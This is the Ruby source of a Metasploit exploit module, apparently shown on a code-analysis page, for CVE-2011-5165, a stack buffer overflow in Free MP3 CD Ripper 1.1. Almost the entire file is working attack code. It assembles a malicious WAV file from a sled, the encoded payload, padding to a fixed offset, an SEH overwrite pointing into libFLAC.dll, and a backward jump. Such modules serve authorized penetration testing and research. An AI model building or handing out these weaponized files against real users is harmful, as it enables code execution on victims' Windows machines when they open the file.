rapid7/metasploit-framework

View on GitHub
modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb

Summary

Maintainability
A
2 hrs
Test Coverage
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Free MP3 CD Ripper 1.1 WAV File Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack based buffer overflow found in Free MP3 CD
        Ripper 1.1.  The overflow is triggered when an unsuspecting user opens a malicious
        WAV file.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Richard Leahy',    # Initial discovery
          'X-h4ck',           # msf module is based on his poc
          'Tiago Henriques',  # msf module
          'James Fitts <fitts.james[at]gmail.com>'       # clean ups
        ],
      'References'     =>
        [
          [ 'CVE', '2011-5165' ],
          [ 'OSVDB', '63349' ],
          [ 'EDB', '11975' ], #Initial disclosure
          [ 'EDB', '17727' ] #This exploit is based on this poc
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => true
        },
      'Payload'        =>
        {
          'BadChars' => "\x00\x0a\x0d\x20",
          'StackAdjustment' => -3500,
          'DisableNops' => 'True',
        },
      'Platform' => 'win',
      'Targets'        =>
        [
          [
            'Windows XP SP3 EN',
            {
              'Ret' => 0x1001860b, # p/p/r in libFLAC.dll
              'Offset' => 4116
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2011-08-27',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.wav']),
      ])
  end

  def exploit

    wav = Metasm::Shellcode.assemble(Metasm::Ia32.new, "inc ecx").encode_string * 100
    wav << payload.encoded
    wav << rand_text_alpha_upper(target['Offset'] - (100 + payload.encoded.length))
    wav << generate_seh_record(target.ret)
    wav << Metasm::Shellcode.assemble(Metasm::Ia32.new, "inc ecx").encode_string * 4
    wav << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-4050").encode_string

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    file_create(wav)

  end
end